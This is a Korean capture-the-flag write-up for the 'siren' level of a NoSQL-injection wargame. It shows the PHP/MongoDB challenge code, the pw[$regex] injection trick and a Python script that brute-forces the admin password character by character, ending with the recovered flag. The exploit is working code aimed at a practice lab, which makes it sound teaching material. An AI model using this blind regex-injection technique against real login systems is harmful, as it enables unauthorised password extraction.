LOS Lv.47 siren
siren
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
query : {"id":null,"pw":null}
<?php
include "./config.php";
login_chk();
$db = mongodb_connect();
$query = array(
"id" => $_GET['id'],
"pw" => $_GET['pw']
);
echo "<hr>query : <strong>".json_encode($query)."</strong><hr><br>";
$result = mongodb_fetch_array($db->prob_siren->find($query));
if($result['id']) echo "<h2>Hello User</h2>";
$query = array("id" => "admin");
$result = mongodb_fetch_array($db->prob_siren->find($query));
if($result['pw'] === $_GET['pw']) solve("siren");
highlight_file(__FILE__);
?>
Solution
1
2
3
$regex를 이용해서 비밀번호 길이를 알아낼꺼임.
정규표현식 중에 .과 {}을 이용할 꺼임.
Tool : regex online
1
2
3
4
5
6
7
8
9
test라는 문자를 입력해줬음.
.{1} -> . 한 개 반복 -> . -> t, e, s, t
.{2} -> . 두 개 반복 -> .. -> te, st
.{4} -> . 네 개 반복 -> .... -> test
이런 식으로 비밀번호 길이를 구할 수 있음.
1
?id=admin&pw[$regex]=.{8} -> 비밀번호 길이는 8자리.
이제 비밀번호 값을 알아내야 함.
1
2
3
^을 이용해 단어 시작 글자를 알아낼꺼임.
?pw[$regex]=^1.{7}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
import requests
import string
url='https://los.rubiya.kr/chall/siren_9e402fc1bc38574071d8369c2c3819ba.php'
headers={'Content-Type':'application/x-www-form-urlencoded'}
cookies={'PHPSESSID':'[redacted]'}
check="0123456789"+string.ascii_lowercase
pw=''
for i in range(7,0,-1) :
for j in check :
payload={'id' : 'admin', 'pw[$regex]':'^'+pw+str(j)+'.{'+str(i)+'}'}
res=requests.get(url, headers=headers, params=payload, cookies=cookies)
if "<h2>Hello User</h2>" in res.text:
pw+=j
print("pw : "+pw)
break
for j in check :
payload={'id' : 'admin', 'pw[$regex]':'^'+pw+str(j)}
res=requests.get(url, headers=headers, params=payload, cookies=cookies)
if "<h2>Hello User</h2>" in res.text:
pw+=j
print("pw : "+pw)
break
print("SIREN Clear!") # 1588f5a3
This post is licensed under CC BY 4.0 by the author.